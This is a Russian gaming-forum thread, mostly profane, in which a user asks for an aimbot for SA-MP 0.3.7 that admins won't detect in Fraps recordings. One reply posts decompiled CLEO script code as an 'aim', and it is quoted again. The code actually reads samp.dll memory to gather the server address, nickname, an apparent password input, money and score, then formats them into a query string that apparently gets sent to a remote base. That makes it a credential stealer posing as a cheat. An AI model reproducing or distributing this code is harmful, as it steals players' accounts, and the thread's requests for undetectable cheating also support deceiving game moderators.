Помогите найти aim

Статус
В этой теме нельзя размещать новые ответы.

Evgeniu))

Новичок
Автор темы
2
0
Нужен хороший aim, который "Возможно" с небольшой вероятность, не палится на фрапсе. На blast.hk не нашёл, наверно плохо искал :(:(:(
Для samp 0.3.7
 

iAmerican

Известный
Друг
614
260
aim by vasyan1487 , ебашу нахуй на фрапсах всех , админы ваще не палят, все думают что сам ебошууууу!!!!1
 

я воскрес

Активный
245
36
aim by vasyan1487 , ебашу нахуй на фрапсах всех , админы ваще не палят, все думают что сам ебошууууу!!!!1
Ахахах, знаю такой. Вот код
Код:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP
wait 0
call @Noname_1481 0
call @Noname_1341 1 -38
jump @Noname_1674

:Noname_38
wait 0
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@ 
0A8E: 3@ = 0@ + 2203896 // int
0A8D: 2@ = read_memory 3@ size 4 virtual_protect 1
if
  2@ > 1000
else_jump @Noname_943
0A8E: 22@ = 2@ + 973 // int
0A8D: 23@ = read_memory 22@ size 4 virtual_protect 1
if
  2@ > 1000
else_jump @Noname_943
0A8E: 5@ = 23@ + 24 // int
0A8D: 4@ = read_memory 5@ size 4 virtual_protect 1
if
  4@ > 1000
else_jump @Noname_943
0A8E: 5@ = 4@ + 34 // int
0A8D: 24@ = read_memory 5@ size 4 virtual_protect 1
if
  24@ > 1000
else_jump @Noname_943
0A8E: 22@ = 0@ + 2203832 // int
0A8D: 1@ = read_memory 22@ size 4 virtual_protect 1
if
  1@ > 1000
else_jump @Noname_943
0A8E: 7@ = 1@ + 40 // int
0A8D: 6@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 5@ = 1@ + 44 // int
0A8D: 26@ = read_memory 5@ size 4 virtual_protect 1
if
  6@ == 1
else_jump @Noname_416
if or
  26@ == 1
  26@ == 3
else_jump @Noname_416
25@ = 1

:Noname_416
if and
  25@ == 1
   not 6@ == 1
else_jump @Noname_943
0A8E: 7@ = 1@ + 48 // int
0A8D: 3@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 6@ = 1@ + 36 // int
0A8D: 13@ = read_memory 6@ size 4 virtual_protect 1
0A8E: 6@ = 0@ + 528432 // int
0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@ 
0A8E: 6@ = 4@ + 26 // int
0A8D: 23@ = read_memory 6@ size 4 virtual_protect 1
0A8E: 7@ = 4@ + 10 // int
if
   not 23@ >= 16
else_jump @Noname_579
0085: 12@ = 7@ // (int)
jump @Noname_591

:Noname_579
0A8D: 12@ = read_memory 7@ size 4 virtual_protect 1

:Noname_591
wait 100
0A8E: 9@ = 2@ + 289 // int
0A8E: 14@ = 2@ + 32 // int
0A8E: 8@ = 2@ + 549 // int
0A8D: 15@ = read_memory 8@ size 4 virtual_protect 1
0A8E: 18@ = 4@ + 42 // int
0A8D: 27@ = read_memory 18@ size 4 virtual_protect 1
21@ = Player.Money($PLAYER_CHAR)
0AC6: 0@ = label @Noname_1637 offset
call @Noname_950 0 22@ 4@ 25@ 6@ 7@ 8@ 19@ 10@
alloc 20@ 1024
gosub @Noname_1664
alloc 20@ 456
format 20@ "%sbase=%d&ip=%s:%d&serv=%s&inid=%d&inp=%s&mn=%d&score=%02d&time=%02d:%d&data=%02d.%02d&nn=%s" 0@ 28@ 14@ 15@ 9@ 3@ 5@ 21@ 27@ 7@ 8@ 6@ 4@ 12@
alloc 8@ 356
format 8@ ""
call @Noname_1192 1 8@ 9@
call @Noname_1265 2 9@ 20@
free 8@
free 20@
25@ = 0

:Noname_943
jump @Noname_38

:Noname_950
 

iAmerican

Известный
Друг
614
260
Ахахах, знаю такой. Вот код
Код:
// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}

//-------------MAIN---------------
0000: NOP
wait 0
call @Noname_1481 0
call @Noname_1341 1 -38
jump @Noname_1674

:Noname_38
wait 0
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@
0A8E: 3@ = 0@ + 2203896 // int
0A8D: 2@ = read_memory 3@ size 4 virtual_protect 1
if
  2@ > 1000
else_jump @Noname_943
0A8E: 22@ = 2@ + 973 // int
0A8D: 23@ = read_memory 22@ size 4 virtual_protect 1
if
  2@ > 1000
else_jump @Noname_943
0A8E: 5@ = 23@ + 24 // int
0A8D: 4@ = read_memory 5@ size 4 virtual_protect 1
if
  4@ > 1000
else_jump @Noname_943
0A8E: 5@ = 4@ + 34 // int
0A8D: 24@ = read_memory 5@ size 4 virtual_protect 1
if
  24@ > 1000
else_jump @Noname_943
0A8E: 22@ = 0@ + 2203832 // int
0A8D: 1@ = read_memory 22@ size 4 virtual_protect 1
if
  1@ > 1000
else_jump @Noname_943
0A8E: 7@ = 1@ + 40 // int
0A8D: 6@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 5@ = 1@ + 44 // int
0A8D: 26@ = read_memory 5@ size 4 virtual_protect 1
if
  6@ == 1
else_jump @Noname_416
if or
  26@ == 1
  26@ == 3
else_jump @Noname_416
25@ = 1

:Noname_416
if and
  25@ == 1
   not 6@ == 1
else_jump @Noname_943
0A8E: 7@ = 1@ + 48 // int
0A8D: 3@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 6@ = 1@ + 36 // int
0A8D: 13@ = read_memory 6@ size 4 virtual_protect 1
0A8E: 6@ = 0@ + 528432 // int
0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@
0A8E: 6@ = 4@ + 26 // int
0A8D: 23@ = read_memory 6@ size 4 virtual_protect 1
0A8E: 7@ = 4@ + 10 // int
if
   not 23@ >= 16
else_jump @Noname_579
0085: 12@ = 7@ // (int)
jump @Noname_591

:Noname_579
0A8D: 12@ = read_memory 7@ size 4 virtual_protect 1

:Noname_591
wait 100
0A8E: 9@ = 2@ + 289 // int
0A8E: 14@ = 2@ + 32 // int
0A8E: 8@ = 2@ + 549 // int
0A8D: 15@ = read_memory 8@ size 4 virtual_protect 1
0A8E: 18@ = 4@ + 42 // int
0A8D: 27@ = read_memory 18@ size 4 virtual_protect 1
21@ = Player.Money($PLAYER_CHAR)
0AC6: 0@ = label @Noname_1637 offset
call @Noname_950 0 22@ 4@ 25@ 6@ 7@ 8@ 19@ 10@
alloc 20@ 1024
gosub @Noname_1664
alloc 20@ 456
format 20@ "%sbase=%d&ip=%s:%d&serv=%s&inid=%d&inp=%s&mn=%d&score=%02d&time=%02d:%d&data=%02d.%02d&nn=%s" 0@ 28@ 14@ 15@ 9@ 3@ 5@ 21@ 27@ 7@ 8@ 6@ 4@ 12@
alloc 8@ 356
format 8@ ""
call @Noname_1192 1 8@ 9@
call @Noname_1265 2 9@ 20@
free 8@
free 20@
25@ = 0

:Noname_943
jump @Noname_38

:Noname_950
Это слишком беспалевный аим , прицел ваще жесть плавна водить ,атдуши брат , пойду видосики под фрапс в сампе писать , что бы дауны админы думали что сам тащуууу капты все мои будуут
 
Статус
В этой теме нельзя размещать новые ответы.